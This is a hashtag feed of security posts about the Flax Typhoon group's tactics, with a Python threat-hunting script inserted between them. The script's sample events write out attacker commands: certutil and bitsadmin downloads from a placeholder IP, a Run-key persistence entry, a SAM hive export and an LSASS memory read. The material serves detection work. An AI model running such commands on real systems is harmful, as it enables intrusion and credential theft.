#mimikatz

Just Another Blue Teamer:

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also provides a starting point for any organization to start threat hunting by using the technical details provided!

Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday
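One way to turn the TTPs listed in the post above into hunting logic, as an added example that is not part of the original post or of Microsoft's report: it runs a few constructed Sysmon-style events (an assumed, simplified shape; the IP is a documentation address) through rules for LOLBIN downloads, Run-key persistence, SAM hive export and LSASS memory reads, and shows why granted access rights matter for keeping Defender's own LSASS handles out of the results.

```python
import re

# Constructed sample events in a simplified Sysmon-like shape (an assumed format, not taken
# from the post or Microsoft's report). EventID 1 = process create, EventID 10 = process access.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -f http://198.51.100.7/tool.exe C:\Users\Public\t.exe"},
    {"id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job /download http://198.51.100.7/a.zip C:\Temp\a.zip"},
    {"id": 1, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d C:\Users\Public\t.exe"},
    {"id": 1, "image": r"C:\Windows\System32\reg.exe", "cmd": r"reg save HKLM\SAM C:\Temp\sam.hiv"},
    {"id": 10, "image": r"C:\Users\Public\t.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1010"},
    {"id": 10, "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1400"},  # query rights only
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe", "cmd": "certutil -verify cert.cer"},
]

DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)
SAM_RE = re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SAM\b", re.I)
PROCESS_VM_READ = 0x10  # access right required to read another process's memory

def classify(ev):
    """Return the technique labels one event trips (empty list if nothing fires)."""
    hits = []
    name = ev["image"].rsplit("\\", 1)[-1].lower()
    if ev["id"] == 1:
        cmd = ev.get("cmd", "")
        if name in DOWNLOADERS and URL_RE.search(cmd):
            hits.append("lolbin_download")        # certutil/bitsadmin/powershell fetching a URL
        if name == "reg.exe" and " add " in cmd.lower() and RUN_KEY_RE.search(cmd):
            hits.append("run_key_persistence")    # Run/RunOnce key modified
        if name == "reg.exe" and SAM_RE.search(cmd):
            hits.append("sam_hive_export")        # SAM hive written to disk
    elif ev["id"] == 10:
        target = ev.get("target", "").rsplit("\\", 1)[-1].lower()
        if target == "lsass.exe" and int(ev.get("access", "0x0"), 16) & PROCESS_VM_READ:
            hits.append("lsass_memory_read")      # LSASS handle that allows memory reads
    return hits

def hunt(events):
    """Group the events that fire by technique label."""
    findings = {}
    for ev in events:
        for label in classify(ev):
            findings.setdefault(label, []).append(ev)
    return findings
```

Running `hunt(SAMPLE_EVENTS)` flags the two downloads, the Run-key write, the SAM export and the LSASS read from the dropped binary, while the Defender engine's query-only handle and the plain `certutil -verify` stay quiet.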
Geekmaster 👽:

Also be sure to turn on these monitoring policies in #DefenderForCloudApps so you can #CatchTheHacker before they get too deep, whether you switch to #Kerberos or not. #NetworkSegregation is also a great #LayeredDefense method to ensure that if one system is compromised the attacker can't use #SMBtraversal to get to all your computers, globally. #EternalBlue source code is still being used to get to #DCs via #Trikbot evolutions, after #Phishing a user with #LocalAdmin privileges, to execute #mimikatz against #ActiveDirectory to steal all the objects. #YesThisHappened